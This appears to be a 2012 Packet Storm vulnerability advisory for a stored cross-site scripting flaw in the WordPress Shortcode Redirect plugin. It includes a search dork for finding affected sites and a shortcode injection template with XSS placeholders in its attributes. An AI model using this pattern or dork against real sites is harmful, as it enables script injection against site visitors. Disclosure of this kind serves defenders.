WordPress Shortcode Redirect 1.0.01 Stored Cross Site Scripting

2012-01-21T00:00:00
ID PACKETSTORM:108914
Type packetstorm
Reporter Gianluca Brindisi
Modified 2012-01-21T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Shortcode Redirect plugin <= 1.0.01 Stored XSS  
# Dork: inurl:/wp-content/plugins/shortcode-redirect/  
# Date: 2012/01/18   
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)  
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip  
# Version: 1.0.01  
  
1) You need permissions to write a post (HTML mode) to exploit the shortcode:  
  
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']  
  
`